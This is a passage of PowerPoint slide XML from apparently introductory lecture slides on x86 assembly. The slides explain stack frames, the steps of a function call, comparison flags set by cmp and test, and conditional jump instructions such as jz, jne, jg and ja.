            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Caller’s Stack Frame</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6106196" y="5283851"/>
              <a:ext cx="2210220" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Caller’s </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Caller’s</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> Stack Frame</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6128501" y="2097361"/>
              <a:ext cx="2227341" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                <a:t>Low Memory Address</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6070034" y="6021288"/>
              <a:ext cx="2271519" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                <a:t>High Memory Address</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13282328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a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Function call procedure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> arguments into the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Allocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> space for local variable &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> base pointer EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Performance function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Restore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> stack to be free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to the previous (original)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> arguments</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Image result for function call in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712" y="3038027"/>
            <a:ext cx="4841776" cy="363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6069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smtClean="0"/>
              <a:t>Conditionals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: instructions that perform the comparison, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Uses with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>flags ZF, CF, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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523483894"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1259632" y="3645024"/>
          <a:ext cx="6096000" cy="21132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GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>ZF</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>CF</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dst</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dst</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> &lt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dst</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> &gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496573" y="2907903"/>
            <a:ext cx="1398140" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400"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21318634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smtClean="0"/>
              <a:t>Branching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: a sequence of code that is conditionally executed depending on the flow of the program, i.e. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>and many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>versions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257621831"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="323528" y="2636912"/>
          <a:ext cx="3960440" cy="4053840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1535124"/>
                <a:gridCol w="2425316"/>
              </a:tblGrid>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jz</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latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>ZF=1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jnz</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latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>ZF=0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jne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latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>!=</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jg</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latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jge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latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>&gt;=</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ja</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" baseline="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err="1" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Jg</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t> unsinged</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>jae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err="1" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Jge</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>, unsigned</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="+mj-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="313299">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
